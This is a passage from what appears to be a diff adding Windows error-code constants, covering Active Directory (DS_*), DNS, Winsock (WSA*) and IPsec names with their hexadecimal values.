+ DS_ALIAS_PROBLEM = 0x2031 + DS_INVALID_DN_SYNTAX = 0x2032 + DS_IS_LEAF = 0x2033 + DS_ALIAS_DEREF_PROBLEM = 0x2034 + DS_UNWILLING_TO_PERFORM = 0x2035 + DS_LOOP_DETECT = 0x2036 + DS_NAMING_VIOLATION = 0x2037 + DS_OBJECT_RESULTS_TOO_LARGE = 0x2038 + DS_AFFECTS_MULTIPLE_DSAS = 0x2039 + DS_SERVER_DOWN = 0x203A + DS_LOCAL_ERROR = 0x203B + DS_ENCODING_ERROR = 0x203C + DS_DECODING_ERROR = 0x203D + DS_FILTER_UNKNOWN = 0x203E + DS_PARAM_ERROR = 0x203F + DS_NOT_SUPPORTED = 0x2040 + DS_NO_RESULTS_RETURNED = 0x2041 + DS_CONTROL_NOT_FOUND = 0x2042 + DS_CLIENT_LOOP = 0x2043 + DS_REFERRAL_LIMIT_EXCEEDED = 0x2044 + DS_SORT_CONTROL_MISSING = 0x2045 + DS_OFFSET_RANGE_ERROR = 0x2046 + DS_ROOT_MUST_BE_NC = 0x206D + DS_ADD_REPLICA_INHIBITED = 0x206E + DS_ATT_NOT_DEF_IN_SCHEMA = 0x206F + DS_MAX_OBJ_SIZE_EXCEEDED = 0x2070 + DS_OBJ_STRING_NAME_EXISTS = 0x2071 + DS_NO_RDN_DEFINED_IN_SCHEMA = 0x2072 + DS_RDN_DOESNT_MATCH_SCHEMA = 0x2073 
+ DS_NO_REQUESTED_ATTS_FOUND = 0x2074 + DS_USER_BUFFER_TO_SMALL = 0x2075 + DS_ATT_IS_NOT_ON_OBJ = 0x2076 + DS_ILLEGAL_MOD_OPERATION = 0x2077 + DS_OBJ_TOO_LARGE = 0x2078 + DS_BAD_INSTANCE_TYPE = 0x2079 + DS_MASTERDSA_REQUIRED = 0x207A + DS_OBJECT_CLASS_REQUIRED = 0x207B + DS_MISSING_REQUIRED_ATT = 0x207C + DS_ATT_NOT_DEF_FOR_CLASS = 0x207D + DS_ATT_ALREADY_EXISTS = 0x207E + DS_CANT_ADD_ATT_VALUES = 0x2080 + DS_SINGLE_VALUE_CONSTRAINT = 0x2081 + DS_RANGE_CONSTRAINT = 0x2082 + DS_ATT_VAL_ALREADY_EXISTS = 0x2083 + DS_CANT_REM_MISSING_ATT = 0x2084 + DS_CANT_REM_MISSING_ATT_VAL = 0x2085 + DS_ROOT_CANT_BE_SUBREF = 0x2086 + DS_NO_CHAINING = 0x2087 + DS_NO_CHAINED_EVAL = 0x2088 + DS_NO_PARENT_OBJECT = 0x2089 + DS_PARENT_IS_AN_ALIAS = 0x208A + DS_CANT_MIX_MASTER_AND_REPS = 0x208B + DS_CHILDREN_EXIST = 0x208C + DS_OBJ_NOT_FOUND = 0x208D + DS_ALIASED_OBJ_MISSING = 0x208E + DS_BAD_NAME_SYNTAX = 0x208F + DS_ALIAS_POINTS_TO_ALIAS = 0x2090 + DS_CANT_DEREF_ALIAS = 0x2091 + DS_OUT_OF_SCOPE = 0x2092 + DS_CANT_DELETE_DSA_OBJ = 0x2094 + DS_GENERIC_ERROR = 0x2095 + DS_DSA_MUST_BE_INT_MASTER = 0x2096 + DS_CLASS_NOT_DSA = 0x2097 + DS_INSUFF_ACCESS_RIGHTS = 0x2098 + DS_ILLEGAL_SUPERIOR = 0x2099 + DS_ATTRIBUTE_OWNED_BY_SAM = 0x209A + DS_NAME_TOO_MANY_PARTS = 0x209B + DS_NAME_TOO_LONG = 0x209C + DS_NAME_VALUE_TOO_LONG = 0x209D + DS_NAME_UNPARSEABLE = 0x209E + DS_NAME_TYPE_UNKNOWN = 0x209F + DS_NOT_AN_OBJECT = 0x20A0 + DS_SEC_DESC_TOO_SHORT = 0x20A1 + DS_SEC_DESC_INVALID = 0x20A2 + DS_NO_DELETED_NAME = 0x20A3 + DS_SUBREF_MUST_HAVE_PARENT = 0x20A4 + DS_NCNAME_MUST_BE_NC = 0x20A5 + DS_CANT_ADD_SYSTEM_ONLY = 0x20A6 + DS_CLASS_MUST_BE_CONCRETE = 0x20A7 + DS_INVALID_DMD = 0x20A8 + DS_OBJ_GUID_EXISTS = 0x20A9 + DS_NOT_ON_BACKLINK = 0x20AA + DS_NO_CROSSREF_FOR_NC = 0x20AB + DS_SHUTTING_DOWN = 0x20AC + DS_UNKNOWN_OPERATION = 0x20AD + DS_INVALID_ROLE_OWNER = 0x20AE + DS_COULDNT_CONTACT_FSMO = 0x20AF + DS_CROSS_NC_DN_RENAME = 0x20B0 + DS_CANT_MOD_SYSTEM_ONLY = 0x20B1 + DS_REPLICATOR_ONLY = 0x20B2 + 
DS_OBJ_CLASS_NOT_DEFINED = 0x20B3 + DS_OBJ_CLASS_NOT_SUBCLASS = 0x20B4 + DS_NAME_REFERENCE_INVALID = 0x20B5 + DS_CROSS_REF_EXISTS = 0x20B6 + DS_CANT_DEL_MASTER_CROSSREF = 0x20B7 + DS_SUBTREE_NOTIFY_NOT_NC_HEAD = 0x20B8 + DS_NOTIFY_FILTER_TOO_COMPLEX = 0x20B9 + DS_DUP_RDN = 0x20BA + DS_DUP_OID = 0x20BB + DS_DUP_MAPI_ID = 0x20BC + DS_DUP_SCHEMA_ID_GUID = 0x20BD + DS_DUP_LDAP_DISPLAY_NAME = 0x20BE + DS_SEMANTIC_ATT_TEST = 0x20BF + DS_SYNTAX_MISMATCH = 0x20C0 + DS_EXISTS_IN_MUST_HAVE = 0x20C1 + DS_EXISTS_IN_MAY_HAVE = 0x20C2 + DS_NONEXISTENT_MAY_HAVE = 0x20C3 + DS_NONEXISTENT_MUST_HAVE = 0x20C4 + DS_AUX_CLS_TEST_FAIL = 0x20C5 + DS_NONEXISTENT_POSS_SUP = 0x20C6 + DS_SUB_CLS_TEST_FAIL = 0x20C7 + DS_BAD_RDN_ATT_ID_SYNTAX = 0x20C8 + DS_EXISTS_IN_AUX_CLS = 0x20C9 + DS_EXISTS_IN_SUB_CLS = 0x20CA + DS_EXISTS_IN_POSS_SUP = 0x20CB + DS_RECALCSCHEMA_FAILED = 0x20CC + DS_TREE_DELETE_NOT_FINISHED = 0x20CD + DS_CANT_DELETE = 0x20CE + DS_ATT_SCHEMA_REQ_ID = 0x20CF + DS_BAD_ATT_SCHEMA_SYNTAX = 0x20D0 + DS_CANT_CACHE_ATT = 0x20D1 + DS_CANT_CACHE_CLASS = 0x20D2 + DS_CANT_REMOVE_ATT_CACHE = 0x20D3 + DS_CANT_REMOVE_CLASS_CACHE = 0x20D4 + DS_CANT_RETRIEVE_DN = 0x20D5 + DS_MISSING_SUPREF = 0x20D6 + DS_CANT_RETRIEVE_INSTANCE = 0x20D7 + DS_CODE_INCONSISTENCY = 0x20D8 + DS_DATABASE_ERROR = 0x20D9 + DS_GOVERNSID_MISSING = 0x20DA + DS_MISSING_EXPECTED_ATT = 0x20DB + DS_NCNAME_MISSING_CR_REF = 0x20DC + DS_SECURITY_CHECKING_ERROR = 0x20DD + DS_SCHEMA_NOT_LOADED = 0x20DE + DS_SCHEMA_ALLOC_FAILED = 0x20DF + DS_ATT_SCHEMA_REQ_SYNTAX = 0x20E0 + DS_GCVERIFY_ERROR = 0x20E1 + DS_DRA_SCHEMA_MISMATCH = 0x20E2 + DS_CANT_FIND_DSA_OBJ = 0x20E3 + DS_CANT_FIND_EXPECTED_NC = 0x20E4 + DS_CANT_FIND_NC_IN_CACHE = 0x20E5 + DS_CANT_RETRIEVE_CHILD = 0x20E6 + DS_SECURITY_ILLEGAL_MODIFY = 0x20E7 + DS_CANT_REPLACE_HIDDEN_REC = 0x20E8 + DS_BAD_HIERARCHY_FILE = 0x20E9 + DS_BUILD_HIERARCHY_TABLE_FAILED = 0x20EA + DS_CONFIG_PARAM_MISSING = 0x20EB + DS_COUNTING_AB_INDICES_FAILED = 0x20EC + DS_HIERARCHY_TABLE_MALLOC_FAILED = 
0x20ED + DS_INTERNAL_FAILURE = 0x20EE + DS_UNKNOWN_ERROR = 0x20EF + DS_ROOT_REQUIRES_CLASS_TOP = 0x20F0 + DS_REFUSING_FSMO_ROLES = 0x20F1 + DS_MISSING_FSMO_SETTINGS = 0x20F2 + DS_UNABLE_TO_SURRENDER_ROLES = 0x20F3 + DS_DRA_GENERIC = 0x20F4 + DS_DRA_INVALID_PARAMETER = 0x20F5 + DS_DRA_BUSY = 0x20F6 + DS_DRA_BAD_DN = 0x20F7 + DS_DRA_BAD_NC = 0x20F8 + DS_DRA_DN_EXISTS = 0x20F9 + DS_DRA_INTERNAL_ERROR = 0x20FA + DS_DRA_INCONSISTENT_DIT = 0x20FB + DS_DRA_CONNECTION_FAILED = 0x20FC + DS_DRA_BAD_INSTANCE_TYPE = 0x20FD + DS_DRA_OUT_OF_MEM = 0x20FE + DS_DRA_MAIL_PROBLEM = 0x20FF + DS_DRA_REF_ALREADY_EXISTS = 0x2100 + DS_DRA_REF_NOT_FOUND = 0x2101 + DS_DRA_OBJ_IS_REP_SOURCE = 0x2102 + DS_DRA_DB_ERROR = 0x2103 + DS_DRA_NO_REPLICA = 0x2104 + DS_DRA_ACCESS_DENIED = 0x2105 + DS_DRA_NOT_SUPPORTED = 0x2106 + DS_DRA_RPC_CANCELLED = 0x2107 + DS_DRA_SOURCE_DISABLED = 0x2108 + DS_DRA_SINK_DISABLED = 0x2109 + DS_DRA_NAME_COLLISION = 0x210A + DS_DRA_SOURCE_REINSTALLED = 0x210B + DS_DRA_MISSING_PARENT = 0x210C + DS_DRA_PREEMPTED = 0x210D + DS_DRA_ABANDON_SYNC = 0x210E + DS_DRA_SHUTDOWN = 0x210F + DS_DRA_INCOMPATIBLE_PARTIAL_SET = 0x2110 + DS_DRA_SOURCE_IS_PARTIAL_REPLICA = 0x2111 + DS_DRA_EXTN_CONNECTION_FAILED = 0x2112 + DS_INSTALL_SCHEMA_MISMATCH = 0x2113 + DS_DUP_LINK_ID = 0x2114 + DS_NAME_RESOLVING = 0x2115 + DS_NAME_NOT_FOUND = 0x2116 + DS_NAME_ERROR_NOT_UNIQUE = 0x2117 + DS_NAME_NO_MAPPING = 0x2118 + DS_NAME_DOMAIN_ONLY = 0x2119 + DS_NAME_NO_SYNTACTICAL_MAPPING = 0x211A + DS_CONSTRUCTED_ATT_MOD = 0x211B + DS_WRONG_OM_OBJ_CLASS = 0x211C + DS_DRA_REPL_PENDING = 0x211D + DS_DS_REQUIRED = 0x211E + DS_INVALID_LDAP_DISPLAY_NAME = 0x211F + DS_NON_BASE_SEARCH = 0x2120 + DS_CANT_RETRIEVE_ATTS = 0x2121 + DS_BACKLINK_WITHOUT_LINK = 0x2122 + DS_EPOCH_MISMATCH = 0x2123 + DS_SRC_NAME_MISMATCH = 0x2124 + DS_SRC_AND_DST_NC_IDENTICAL = 0x2125 + DS_DST_NC_MISMATCH = 0x2126 + DS_NOT_AUTHORITIVE_FOR_DST_NC = 0x2127 + DS_SRC_GUID_MISMATCH = 0x2128 + DS_CANT_MOVE_DELETED_OBJECT = 0x2129 + 
DS_PDC_OPERATION_IN_PROGRESS = 0x212A + DS_CROSS_DOMAIN_CLEANUP_REQD = 0x212B + DS_ILLEGAL_XDOM_MOVE_OPERATION = 0x212C + DS_CANT_WITH_ACCT_GROUP_MEMBERSHPS = 0x212D + DS_NC_MUST_HAVE_NC_PARENT = 0x212E + DS_CR_IMPOSSIBLE_TO_VALIDATE = 0x212F + DS_DST_DOMAIN_NOT_NATIVE = 0x2130 + DS_MISSING_INFRASTRUCTURE_CONTAINER = 0x2131 + DS_CANT_MOVE_ACCOUNT_GROUP = 0x2132 + DS_CANT_MOVE_RESOURCE_GROUP = 0x2133 + DS_INVALID_SEARCH_FLAG = 0x2134 + DS_NO_TREE_DELETE_ABOVE_NC = 0x2135 + DS_COULDNT_LOCK_TREE_FOR_DELETE = 0x2136 + DS_COULDNT_IDENTIFY_OBJECTS_FOR_TREE_DELETE = 0x2137 + DS_SAM_INIT_FAILURE = 0x2138 + DS_SENSITIVE_GROUP_VIOLATION = 0x2139 + DS_CANT_MOD_PRIMARYGROUPID = 0x213A + DS_ILLEGAL_BASE_SCHEMA_MOD = 0x213B + DS_NONSAFE_SCHEMA_CHANGE = 0x213C + DS_SCHEMA_UPDATE_DISALLOWED = 0x213D + DS_CANT_CREATE_UNDER_SCHEMA = 0x213E + DS_INSTALL_NO_SRC_SCH_VERSION = 0x213F + DS_INSTALL_NO_SCH_VERSION_IN_INIFILE = 0x2140 + DS_INVALID_GROUP_TYPE = 0x2141 + DS_NO_NEST_GLOBALGROUP_IN_MIXEDDOMAIN = 0x2142 + DS_NO_NEST_LOCALGROUP_IN_MIXEDDOMAIN = 0x2143 + DS_GLOBAL_CANT_HAVE_LOCAL_MEMBER = 0x2144 + DS_GLOBAL_CANT_HAVE_UNIVERSAL_MEMBER = 0x2145 + DS_UNIVERSAL_CANT_HAVE_LOCAL_MEMBER = 0x2146 + DS_GLOBAL_CANT_HAVE_CROSSDOMAIN_MEMBER = 0x2147 + DS_LOCAL_CANT_HAVE_CROSSDOMAIN_LOCAL_MEMBER = 0x2148 + DS_HAVE_PRIMARY_MEMBERS = 0x2149 + DS_STRING_SD_CONVERSION_FAILED = 0x214A + DS_NAMING_MASTER_GC = 0x214B + DS_LOOKUP_FAILURE = 0x214C + DS_COULDNT_UPDATE_SPNS = 0x214D + DS_CANT_RETRIEVE_SD = 0x214E + DS_KEY_NOT_UNIQUE = 0x214F + DS_WRONG_LINKED_ATT_SYNTAX = 0x2150 + DS_SAM_NEED_BOOTKEY_PASSWORD = 0x2151 + DS_SAM_NEED_BOOTKEY_FLOPPY = 0x2152 + DS_CANT_START = 0x2153 + DS_INIT_FAILURE = 0x2154 + DS_NO_PKT_PRIVACY_ON_CONNECTION = 0x2155 + DS_SOURCE_DOMAIN_IN_FOREST = 0x2156 + DS_DESTINATION_DOMAIN_NOT_IN_FOREST = 0x2157 + DS_DESTINATION_AUDITING_NOT_ENABLED = 0x2158 + DS_CANT_FIND_DC_FOR_SRC_DOMAIN = 0x2159 + DS_SRC_OBJ_NOT_GROUP_OR_USER = 0x215A + DS_SRC_SID_EXISTS_IN_FOREST = 0x215B + 
DS_SRC_AND_DST_OBJECT_CLASS_MISMATCH = 0x215C + SAM_INIT_FAILURE = 0x215D + DS_DRA_SCHEMA_INFO_SHIP = 0x215E + DS_DRA_SCHEMA_CONFLICT = 0x215F + DS_DRA_EARLIER_SCHEMA_CONLICT = 0x2160 + DS_DRA_OBJ_NC_MISMATCH = 0x2161 + DS_NC_STILL_HAS_DSAS = 0x2162 + DS_GC_REQUIRED = 0x2163 + DS_LOCAL_MEMBER_OF_LOCAL_ONLY = 0x2164 + DS_NO_FPO_IN_UNIVERSAL_GROUPS = 0x2165 + DS_CANT_ADD_TO_GC = 0x2166 + DS_NO_CHECKPOINT_WITH_PDC = 0x2167 + DS_SOURCE_AUDITING_NOT_ENABLED = 0x2168 + DS_CANT_CREATE_IN_NONDOMAIN_NC = 0x2169 + DS_INVALID_NAME_FOR_SPN = 0x216A + DS_FILTER_USES_CONTRUCTED_ATTRS = 0x216B + DS_UNICODEPWD_NOT_IN_QUOTES = 0x216C + DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED = 0x216D + DS_MUST_BE_RUN_ON_DST_DC = 0x216E + DS_SRC_DC_MUST_BE_SP4_OR_GREATER = 0x216F + DS_CANT_TREE_DELETE_CRITICAL_OBJ = 0x2170 + DS_INIT_FAILURE_CONSOLE = 0x2171 + DS_SAM_INIT_FAILURE_CONSOLE = 0x2172 + DS_FOREST_VERSION_TOO_HIGH = 0x2173 + DS_DOMAIN_VERSION_TOO_HIGH = 0x2174 + DS_FOREST_VERSION_TOO_LOW = 0x2175 + DS_DOMAIN_VERSION_TOO_LOW = 0x2176 + DS_INCOMPATIBLE_VERSION = 0x2177 + DS_LOW_DSA_VERSION = 0x2178 + DS_NO_BEHAVIOR_VERSION_IN_MIXEDDOMAIN = 0x2179 + DS_NOT_SUPPORTED_SORT_ORDER = 0x217A + DS_NAME_NOT_UNIQUE = 0x217B + DS_MACHINE_ACCOUNT_CREATED_PRENT4 = 0x217C + DS_OUT_OF_VERSION_STORE = 0x217D + DS_INCOMPATIBLE_CONTROLS_USED = 0x217E + DS_NO_REF_DOMAIN = 0x217F + DS_RESERVED_LINK_ID = 0x2180 + DS_LINK_ID_NOT_AVAILABLE = 0x2181 + DS_AG_CANT_HAVE_UNIVERSAL_MEMBER = 0x2182 + DS_MODIFYDN_DISALLOWED_BY_INSTANCE_TYPE = 0x2183 + DS_NO_OBJECT_MOVE_IN_SCHEMA_NC = 0x2184 + DS_MODIFYDN_DISALLOWED_BY_FLAG = 0x2185 + DS_MODIFYDN_WRONG_GRANDPARENT = 0x2186 + DS_NAME_TRUST_REFERRAL = 0x2187 + NOT_SUPPORTED_ON_STANDARD_SERVER = 0x2188 + DS_CANT_ACCESS_REMOTE_PART_OF_AD = 0x2189 + DS_CR_IMPOSSIBLE_TO_VALIDATE_V2 = 0x218A + DS_THREAD_LIMIT_EXCEEDED = 0x218B + DS_NOT_CLOSEST = 0x218C + DS_CANT_DERIVE_SPN_WITHOUT_SERVER_REF = 0x218D + DS_SINGLE_USER_MODE_FAILED = 0x218E + DS_NTDSCRIPT_SYNTAX_ERROR = 0x218F + 
DS_NTDSCRIPT_PROCESS_ERROR = 0x2190 + DS_DIFFERENT_REPL_EPOCHS = 0x2191 + DS_DRS_EXTENSIONS_CHANGED = 0x2192 + DS_REPLICA_SET_CHANGE_NOT_ALLOWED_ON_DISABLED_CR = 0x2193 + DS_NO_MSDS_INTID = 0x2194 + DS_DUP_MSDS_INTID = 0x2195 + DS_EXISTS_IN_RDNATTID = 0x2196 + DS_AUTHORIZATION_FAILED = 0x2197 + DS_INVALID_SCRIPT = 0x2198 + DS_REMOTE_CROSSREF_OP_FAILED = 0x2199 + DS_CROSS_REF_BUSY = 0x219A + DS_CANT_DERIVE_SPN_FOR_DELETED_DOMAIN = 0x219B + DS_CANT_DEMOTE_WITH_WRITEABLE_NC = 0x219C + DS_DUPLICATE_ID_FOUND = 0x219D + DS_INSUFFICIENT_ATTR_TO_CREATE_OBJECT = 0x219E + DS_GROUP_CONVERSION_ERROR = 0x219F + DS_CANT_MOVE_APP_BASIC_GROUP = 0x21A0 + DS_CANT_MOVE_APP_QUERY_GROUP = 0x21A1 + DS_ROLE_NOT_VERIFIED = 0x21A2 + DS_WKO_CONTAINER_CANNOT_BE_SPECIAL = 0x21A3 + DS_DOMAIN_RENAME_IN_PROGRESS = 0x21A4 + DS_EXISTING_AD_CHILD_NC = 0x21A5 + DS_REPL_LIFETIME_EXCEEDED = 0x21A6 + DS_DISALLOWED_IN_SYSTEM_CONTAINER = 0x21A7 + DS_LDAP_SEND_QUEUE_FULL = 0x21A8 + DS_DRA_OUT_SCHEDULE_WINDOW = 0x21A9 + DS_POLICY_NOT_KNOWN = 0x21AA + NO_SITE_SETTINGS_OBJECT = 0x21AB + NO_SECRETS = 0x21AC + NO_WRITABLE_DC_FOUND = 0x21AD + DS_NO_SERVER_OBJECT = 0x21AE + DS_NO_NTDSA_OBJECT = 0x21AF + DS_NON_ASQ_SEARCH = 0x21B0 + DS_AUDIT_FAILURE = 0x21B1 + DS_INVALID_SEARCH_FLAG_SUBTREE = 0x21B2 + DS_INVALID_SEARCH_FLAG_TUPLE = 0x21B3 + DS_HIERARCHY_TABLE_TOO_DEEP = 0x21B4 + DS_DRA_CORRUPT_UTD_VECTOR = 0x21B5 + DS_DRA_SECRETS_DENIED = 0x21B6 + DS_RESERVED_MAPI_ID = 0x21B7 + DS_MAPI_ID_NOT_AVAILABLE = 0x21B8 + DS_DRA_MISSING_KRBTGT_SECRET = 0x21B9 + DS_DOMAIN_NAME_EXISTS_IN_FOREST = 0x21BA + DS_FLAT_NAME_EXISTS_IN_FOREST = 0x21BB + INVALID_USER_PRINCIPAL_NAME = 0x21BC + DS_OID_MAPPED_GROUP_CANT_HAVE_MEMBERS = 0x21BD + DS_OID_NOT_FOUND = 0x21BE + DS_DRA_RECYCLED_TARGET = 0x21BF + DNS_RCODE_FORMAT_ERROR = 0x2329 + DNS_RCODE_SERVER_FAILURE = 0x232A + DNS_RCODE_NAME_ERROR = 0x232B + DNS_RCODE_NOT_IMPLEMENTED = 0x232C + DNS_RCODE_REFUSED = 0x232D + DNS_RCODE_YXDOMAIN = 0x232E + DNS_RCODE_YXRRSET = 0x232F + 
DNS_RCODE_NXRRSET = 0x2330 + DNS_RCODE_NOTAUTH = 0x2331 + DNS_RCODE_NOTZONE = 0x2332 + DNS_RCODE_BADSIG = 0x2338 + DNS_RCODE_BADKEY = 0x2339 + DNS_RCODE_BADTIME = 0x233A + DNS_INFO_NO_RECORDS = 0x251D + DNS_BAD_PACKET = 0x251E + DNS_NO_PACKET = 0x251F + DNS_RCODE = 0x2520 + DNS_UNSECURE_PACKET = 0x2521 + DNS_INVALID_TYPE = 0x254F + DNS_INVALID_IP_ADDRESS = 0x2550 + DNS_INVALID_PROPERTY = 0x2551 + DNS_TRY_AGAIN_LATER = 0x2552 + DNS_NOT_UNIQUE = 0x2553 + DNS_NON_RFC_NAME = 0x2554 + DNS_STATUS_FQDN = 0x2555 + DNS_STATUS_DOTTED_NAME = 0x2556 + DNS_STATUS_SINGLE_PART_NAME = 0x2557 + DNS_INVALID_NAME_CHAR = 0x2558 + DNS_NUMERIC_NAME = 0x2559 + DNS_NOT_ALLOWED_ON_ROOT_SERVER = 0x255A + DNS_NOT_ALLOWED_UNDER_DELEGATION = 0x255B + DNS_CANNOT_FIND_ROOT_HINTS = 0x255C + DNS_INCONSISTENT_ROOT_HINTS = 0x255D + DNS_DWORD_VALUE_TOO_SMALL = 0x255E + DNS_DWORD_VALUE_TOO_LARGE = 0x255F + DNS_BACKGROUND_LOADING = 0x2560 + DNS_NOT_ALLOWED_ON_RODC = 0x2561 + DNS_NOT_ALLOWED_UNDER_DNAME = 0x2562 + DNS_DELEGATION_REQUIRED = 0x2563 + DNS_INVALID_POLICY_TABLE = 0x2564 + DNS_ZONE_DOES_NOT_EXIST = 0x2581 + DNS_NO_ZONE_INFO = 0x2582 + DNS_INVALID_ZONE_OPERATION = 0x2583 + DNS_ZONE_CONFIGURATION_ERROR = 0x2584 + DNS_ZONE_HAS_NO_SOA_RECORD = 0x2585 + DNS_ZONE_HAS_NO_NS_RECORDS = 0x2586 + DNS_ZONE_LOCKED = 0x2587 + DNS_ZONE_CREATION_FAILED = 0x2588 + DNS_ZONE_ALREADY_EXISTS = 0x2589 + DNS_AUTOZONE_ALREADY_EXISTS = 0x258A + DNS_INVALID_ZONE_TYPE = 0x258B + DNS_SECONDARY_REQUIRES_MASTER_IP = 0x258C + DNS_ZONE_NOT_SECONDARY = 0x258D + DNS_NEED_SECONDARY_ADDRESSES = 0x258E + DNS_WINS_INIT_FAILED = 0x258F + DNS_NEED_WINS_SERVERS = 0x2590 + DNS_NBSTAT_INIT_FAILED = 0x2591 + DNS_SOA_DELETE_INVALID = 0x2592 + DNS_FORWARDER_ALREADY_EXISTS = 0x2593 + DNS_ZONE_REQUIRES_MASTER_IP = 0x2594 + DNS_ZONE_IS_SHUTDOWN = 0x2595 + DNS_PRIMARY_REQUIRES_DATAFILE = 0x25B3 + DNS_INVALID_DATAFILE_NAME = 0x25B4 + DNS_DATAFILE_OPEN_FAILURE = 0x25B5 + DNS_FILE_WRITEBACK_FAILED = 0x25B6 + DNS_DATAFILE_PARSING = 0x25B7 + 
DNS_RECORD_DOES_NOT_EXIST = 0x25E5 + DNS_RECORD_FORMAT = 0x25E6 + DNS_NODE_CREATION_FAILED = 0x25E7 + DNS_UNKNOWN_RECORD_TYPE = 0x25E8 + DNS_RECORD_TIMED_OUT = 0x25E9 + DNS_NAME_NOT_IN_ZONE = 0x25EA + DNS_CNAME_LOOP = 0x25EB + DNS_NODE_IS_CNAME = 0x25EC + DNS_CNAME_COLLISION = 0x25ED + DNS_RECORD_ONLY_AT_ZONE_ROOT = 0x25EE + DNS_RECORD_ALREADY_EXISTS = 0x25EF + DNS_SECONDARY_DATA = 0x25F0 + DNS_NO_CREATE_CACHE_DATA = 0x25F1 + DNS_NAME_DOES_NOT_EXIST = 0x25F2 + DNS_WARNING_PTR_CREATE_FAILED = 0x25F3 + DNS_WARNING_DOMAIN_UNDELETED = 0x25F4 + DNS_DS_UNAVAILABLE = 0x25F5 + DNS_DS_ZONE_ALREADY_EXISTS = 0x25F6 + DNS_NO_BOOTFILE_IF_DS_ZONE = 0x25F7 + DNS_NODE_IS_DNAME = 0x25F8 + DNS_DNAME_COLLISION = 0x25F9 + DNS_ALIAS_LOOP = 0x25FA + DNS_INFO_AXFR_COMPLETE = 0x2617 + DNS_AXFR = 0x2618 + DNS_INFO_ADDED_LOCAL_WINS = 0x2619 + DNS_STATUS_CONTINUE_NEEDED = 0x2649 + DNS_NO_TCPIP = 0x267B + DNS_NO_DNS_SERVERS = 0x267C + DNS_DP_DOES_NOT_EXIST = 0x26AD + DNS_DP_ALREADY_EXISTS = 0x26AE + DNS_DP_NOT_ENLISTED = 0x26AF + DNS_DP_ALREADY_ENLISTED = 0x26B0 + DNS_DP_NOT_AVAILABLE = 0x26B1 + DNS_DP_FSMO_ERROR = 0x26B2 + WSAEINTR = 0x2714 + WSAEBADF = 0x2719 + WSAEACCES = 0x271D + WSAEFAULT = 0x271E + WSAEINVAL = 0x2726 + WSAEMFILE = 0x2728 + WSAEWOULDBLOCK = 0x2733 + WSAEINPROGRESS = 0x2734 + WSAEALREADY = 0x2735 + WSAENOTSOCK = 0x2736 + WSAEDESTADDRREQ = 0x2737 + WSAEMSGSIZE = 0x2738 + WSAEPROTOTYPE = 0x2739 + WSAENOPROTOOPT = 0x273A + WSAEPROTONOSUPPORT = 0x273B + WSAESOCKTNOSUPPORT = 0x273C + WSAEOPNOTSUPP = 0x273D + WSAEPFNOSUPPORT = 0x273E + WSAEAFNOSUPPORT = 0x273F + WSAEADDRINUSE = 0x2740 + WSAEADDRNOTAVAIL = 0x2741 + WSAENETDOWN = 0x2742 + WSAENETUNREACH = 0x2743 + WSAENETRESET = 0x2744 + WSAECONNABORTED = 0x2745 + WSAECONNRESET = 0x2746 + WSAENOBUFS = 0x2747 + WSAEISCONN = 0x2748 + WSAENOTCONN = 0x2749 + WSAESHUTDOWN = 0x274A + WSAETOOMANYREFS = 0x274B + WSAETIMEDOUT = 0x274C + WSAECONNREFUSED = 0x274D + WSAELOOP = 0x274E + WSAENAMETOOLONG = 0x274F + WSAEHOSTDOWN = 0x2750 + 
WSAEHOSTUNREACH = 0x2751 + WSAENOTEMPTY = 0x2752 + WSAEPROCLIM = 0x2753 + WSAEUSERS = 0x2754 + WSAEDQUOT = 0x2755 + WSAESTALE = 0x2756 + WSAEREMOTE = 0x2757 + WSASYSNOTREADY = 0x276B + WSAVERNOTSUPPORTED = 0x276C + WSANOTINITIALISED = 0x276D + WSAEDISCON = 0x2775 + WSAENOMORE = 0x2776 + WSAECANCELLED = 0x2777 + WSAEINVALIDPROCTABLE = 0x2778 + WSAEINVALIDPROVIDER = 0x2779 + WSAEPROVIDERFAILEDINIT = 0x277A + WSASYSCALLFAILURE = 0x277B + WSASERVICE_NOT_FOUND = 0x277C + WSATYPE_NOT_FOUND = 0x277D + WSA_E_NO_MORE = 0x277E + WSA_E_CANCELLED = 0x277F + WSAEREFUSED = 0x2780 + WSAHOST_NOT_FOUND = 0x2AF9 + WSATRY_AGAIN = 0x2AFA + WSANO_RECOVERY = 0x2AFB + WSANO_DATA = 0x2AFC + WSA_QOS_RECEIVERS = 0x2AFD + WSA_QOS_SENDERS = 0x2AFE + WSA_QOS_NO_SENDERS = 0x2AFF + WSA_QOS_NO_RECEIVERS = 0x2B00 + WSA_QOS_REQUEST_CONFIRMED = 0x2B01 + WSA_QOS_ADMISSION_FAILURE = 0x2B02 + WSA_QOS_POLICY_FAILURE = 0x2B03 + WSA_QOS_BAD_STYLE = 0x2B04 + WSA_QOS_BAD_OBJECT = 0x2B05 + WSA_QOS_TRAFFIC_CTRL_ERROR = 0x2B06 + WSA_QOS_GENERIC_ERROR = 0x2B07 + WSA_QOS_ESERVICETYPE = 0x2B08 + WSA_QOS_EFLOWSPEC = 0x2B09 + WSA_QOS_EPROVSPECBUF = 0x2B0A + WSA_QOS_EFILTERSTYLE = 0x2B0B + WSA_QOS_EFILTERTYPE = 0x2B0C + WSA_QOS_EFILTERCOUNT = 0x2B0D + WSA_QOS_EOBJLENGTH = 0x2B0E + WSA_QOS_EFLOWCOUNT = 0x2B0F + WSA_QOS_EUNKNOWNPSOBJ = 0x2B10 + WSA_QOS_EPOLICYOBJ = 0x2B11 + WSA_QOS_EFLOWDESC = 0x2B12 + WSA_QOS_EPSFLOWSPEC = 0x2B13 + WSA_QOS_EPSFILTERSPEC = 0x2B14 + WSA_QOS_ESDMODEOBJ = 0x2B15 + WSA_QOS_ESHAPERATEOBJ = 0x2B16 + WSA_QOS_RESERVED_PETYPE = 0x2B17 + IPSEC_QM_POLICY_EXISTS = 0x32C8 + IPSEC_QM_POLICY_NOT_FOUND = 0x32C9 + IPSEC_QM_POLICY_IN_USE = 0x32CA + IPSEC_MM_POLICY_EXISTS = 0x32CB + IPSEC_MM_POLICY_NOT_FOUND = 0x32CC + IPSEC_MM_POLICY_IN_USE = 0x32CD + IPSEC_MM_FILTER_EXISTS = 0x32CE + IPSEC_MM_FILTER_NOT_FOUND = 0x32CF + IPSEC_TRANSPORT_FILTER_EXISTS = 0x32D0 + IPSEC_TRANSPORT_FILTER_NOT_FOUND = 0x32D1 + IPSEC_MM_AUTH_EXISTS = 0x32D2 + IPSEC_MM_AUTH_NOT_FOUND = 0x32D3 + IPSEC_MM_AUTH_IN_USE = 0x32D4 + 
